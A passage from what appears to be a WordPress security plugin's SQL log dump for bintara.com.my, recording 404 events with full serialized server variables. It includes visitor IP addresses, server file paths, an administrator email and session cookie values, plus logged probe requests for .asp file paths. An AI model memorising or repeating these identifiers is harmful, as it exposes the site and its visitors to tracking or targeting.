E_ADDR\";s:14:\"183.171.185.27\";s:11:\"REMOTE_PORT\";s:5:\"52673\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/2.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XaPdhAcl7hU0V3byd4gBUQAAAAE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571020164.2204\";s:12:\"REQUEST_TIME\";s:10:\"1571020164\";}}','notice','2019-10-14 02:29:26','2019-10-14 02:29:24',35747056,37545896,'https://bintara.com.my/AutoDiscover/autodiscover.xml',1,0,'183.171.185.27'),(27988,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:14:\"/toughbook-33/\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:18:\"HTTP_CACHE_CONTROL\";s:8:\"no-cache\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_FROM\";s:24:\"bingbot(at)microsoft.com\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:11:\"HTTP_PRAGMA\";s:8:\"no-cache\";s:15:\"HTTP_USER_AGENT\";s:71:\"Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:36:\"https://bintara.com.my/toughbook-33/\";s:19:\"REDIRECT_SCRIPT_URL\";s:14:\"/toughbook-33/\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XaPR1elZYF3OM5JckyO3TgAAAYo\";s:12:\"REDIRECT_URL\";s:14:\"/toughbook-33/\";s:11:\"REMOTE_ADDR\";s:13:\"157.55.39.137\";s:11:\"REMOTE_PORT\";s:4:\"8745\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:36:\"https://bintara.com.my/toughbook-33/\";s:10:\"SCRIPT_URL\";s:14:\"/toughbook-33/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XaPR1elZYF3OM5JckyO3TgAAAYo\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571017173.5464\";s:12:\"REQUEST_TIME\";s:10:\"1571017173\";}}','notice','2019-10-14 01:39:36','2019-10-14 01:39:33',33924104,35726312,'https://bintara.com.my/toughbook-33/',1,0,'157.55.39.137'),(27987,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=11\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:134:\"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.1.17322\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=11\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"195.140.212.5\";s:11:\"REMOTE_PORT\";s:4:\"8535\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XaPQOJ3yMIdDGtzW2QqmSwAAAcA\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571016760.5514\";s:12:\"REQUEST_TIME\";s:10:\"1571016760\";}}','notice','2019-10-14 01:32:43','2019-10-14 01:32:41',35422960,37230944,'https://bintara.com.my/?page_id=11',1,0,'195.140.212.5'),(27986,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:63:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/AutoDiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"315\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:6:\"H2PUSH\";s:2:\"on\";s:7:\"H2_PUSH\";s:2:\"on\";s:9:\"H2_PUSHED\";s:0:\"\";s:12:\"H2_PUSHED_ON\";s:0:\"\";s:12:\"H2_STREAM_ID\";s:1:\"1\";s:13:\"H2_STREAM_TAG\";s:5:\"472-1\";s:5:\"HTTP2\";s:2:\"on\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"en-us\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:16:\"Microsoft Office\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:25:\"HTTP_X_OFFICE_APPLICATION\";s:1:\"0\";s:27:\"HTTP_X_OFFICE_AUDIENCEGROUP\";s:10:\"Production\";s:27:\"HTTP_X_OFFICE_MAJOR_VERSION\";s:2:\"16\";s:22:\"HTTP_X_OFFICE_PLATFORM\";s:3:\"Mac\";s:23:\"HTTP_X_OFFICE_SESSIONID\";s:36:\"C532464D-3216-4EE0-9C57-CA02E58147C8\";s:21:\"HTTP_X_OFFICE_VERSION\";s:9:\"16.29.917\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_H2PUSH\";s:2:\"on\";s:16:\"REDIRECT_H2_PUSH\";s:2:\"on\";s:18:\"REDIRECT_H2_PUSHED\";s:0:\"\";s:21:\"REDIRECT_H2_PUSHED_ON\";s:0:\"\";s:21:\"REDIRECT_H2_STREAM_ID\";s:1:\"1\";s:22:\"REDIRECT_H2_STREAM_TAG\";s:5:\"472-1\";s:14:\"REDIRECT_HTTP2\";s:2:\"on\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XaPM9J3yMIdDGtzW2Qqj8gAAAAE\";s:12:\"REDIRECT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:14:\"175.142.119.93\";s:11:\"REMOTE_PORT\";s:5:\"49624\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/2.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XaPM9J3yMIdDGtzW2Qqj8gAAAAE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571015924.1017\";s:12:\"REQUEST_TIME\";s:10:\"1571015924\";}}','notice','2019-10-14 01:18:46','2019-10-14 01:18:44',35745616,37538704,'https://bintara.com.my/AutoDiscover/autodiscover.xml',1,0,'175.142.119.93'),(27985,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:48:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/AutoDiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"315\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:72:\"Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.11929; Pro)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:25:\"HTTP_X_OFFICE_APPLICATION\";s:1:\"1\";s:27:\"HTTP_X_OFFICE_AUDIENCEGROUP\";s:8:\"Insiders\";s:27:\"HTTP_X_OFFICE_MAJOR_VERSION\";s:2:\"16\";s:22:\"HTTP_X_OFFICE_PLATFORM\";s:5:\"Win32\";s:23:\"HTTP_X_OFFICE_SESSIONID\";s:36:\"0E86F29E-C0AA-4259-B690-D74F0C46A790\";s:21:\"HTTP_X_OFFICE_VERSION\";s:10:\"16.0.11929\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XaPEE53yMIdDGtzW2QqffQAAAdg\";s:12:\"REDIRECT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:14:\"175.142.119.93\";s:11:\"REMOTE_PORT\";s:5:\"50012\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XaPEE53yMIdDGtzW2QqffQAAAdg\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571013651.8935\";s:12:\"REQUEST_TIME\";s:10:\"1571013651\";}}','notice','2019-10-14 00:40:53','2019-10-14 00:40:52',35342568,37138664,'https://bintara.com.my/AutoDiscover/autodiscover.xml',1,0,'175.142.119.93'),(27984,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:48:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/AutoDiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"317\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:72:\"Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.11929; Pro)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:25:\"HTTP_X_OFFICE_APPLICATION\";s:1:\"1\";s:27:\"HTTP_X_OFFICE_AUDIENCEGROUP\";s:8:\"Insiders\";s:27:\"HTTP_X_OFFICE_MAJOR_VERSION\";s:2:\"16\";s:22:\"HTTP_X_OFFICE_PLATFORM\";s:5:\"Win32\";s:23:\"HTTP_X_OFFICE_SESSIONID\";s:36:\"CCDC63C3-C769-4B24-99AB-73411FE05121\";s:21:\"HTTP_X_OFFICE_VERSION\";s:10:\"16.0.11929\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XaPBaJ3yMIdDGtzW2QqeHAAAAcc\";s:12:\"REDIRECT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:14:\"175.142.119.93\";s:11:\"REMOTE_PORT\";s:5:\"57758\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XaPBaJ3yMIdDGtzW2QqeHAAAAcc\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571012968.7149\";s:12:\"REQUEST_TIME\";s:10:\"1571012968\";}}','notice','2019-10-14 00:29:31','2019-10-14 00:29:29',35733120,37522360,'https://bintara.com.my/AutoDiscover/autodiscover.xml',1,0,'175.142.119.93'),(27983,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:40:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:27:\"/blog/tag/logitech-vc/feed/\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"deflate, gzip\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:66:\"Mozilla/5.0 (compatible; AhrefsBot/6.1; +http://ahrefs.com/robot/)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:49:\"https://bintara.com.my/blog/tag/logitech-vc/feed/\";s:19:\"REDIRECT_SCRIPT_URL\";s:27:\"/blog/tag/logitech-vc/feed/\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XaPA7-QC6t3H7XFlXg01yQAAARY\";s:12:\"REDIRECT_URL\";s:27:\"/blog/tag/logitech-vc/feed/\";s:11:\"REMOTE_ADDR\";s:12:\"54.36.148.88\";s:11:\"REMOTE_PORT\";s:5:\"23596\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:49:\"https://bintara.com.my/blog/tag/logitech-vc/feed/\";s:10:\"SCRIPT_URL\";s:27:\"/blog/tag/logitech-vc/feed/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XaPA7-QC6t3H7XFlXg01yQAAARY\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571012847.5128\";s:12:\"REQUEST_TIME\";s:10:\"1571012847\";}}','notice','2019-10-14 00:27:30','2019-10-14 00:27:27',35427328,37233616,'https://bintara.com.my/blog/tag/logitech-vc/feed/',1,0,'54.36.148.88'),(27982,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:47:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/404/hxg.asp\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=33f64cb813015dd73e17cb97c16b5e8b\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:34:\"http://bintara.com.my//404/hxg.asp\";s:15:\"HTTP_USER_AGENT\";s:50:\"Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:34:\"https://bintara.com.my/404/hxg.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:12:\"/404/hxg.asp\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XaOrs0-otKDtdVthBilFiwAAAIY\";s:12:\"REDIRECT_URL\";s:12:\"/404/hxg.asp\";s:20:\"REDIRECT_nokeepalive\";s:1:\"1\";s:29:\"REDIRECT_ssl_unclean_shutdown\";s:1:\"1\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"64399\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:34:\"https://bintara.com.my/404/hxg.asp\";s:10:\"SCRIPT_URL\";s:12:\"/404/hxg.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XaOrs0-otKDtdVthBilFiwAAAIY\";s:11:\"nokeepalive\";s:1:\"1\";s:20:\"ssl_unclean_shutdown\";s:1:\"1\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571007411.9247\";s:12:\"REQUEST_TIME\";s:10:\"1571007411\";}}','notice','2019-10-13 22:56:53','2019-10-13 22:56:52',35021688,36823208,'https://bintara.com.my/404/hxg.asp',1,0,'103.115.42.42'),(27981,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:47:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:28:\"/theme/default/sdcms_404.asp\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=30454a73ed00868b90680feed8263d38\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:50:\"http://bintara.com.my//theme/default/sdcms_404.asp\";s:15:\"HTTP_USER_AGENT\";s:50:\"Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:50:\"https://bintara.com.my/theme/default/sdcms_404.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:28:\"/theme/default/sdcms_404.asp\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XaOrnelZYF3OM5JckyOytAAAAZY\";s:12:\"REDIRECT_URL\";s:28:\"/theme/default/sdcms_404.asp\";s:20:\"REDIRECT_nokeepalive\";s:1:\"1\";s:29:\"REDIRECT_ssl_unclean_shutdown\";s:1:\"1\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"63808\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:50:\"https://bintara.com.my/theme/default/sdcms_404.asp\";s:10:\"SCRIPT_URL\";s:28:\"/theme/default/sdcms_404.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11: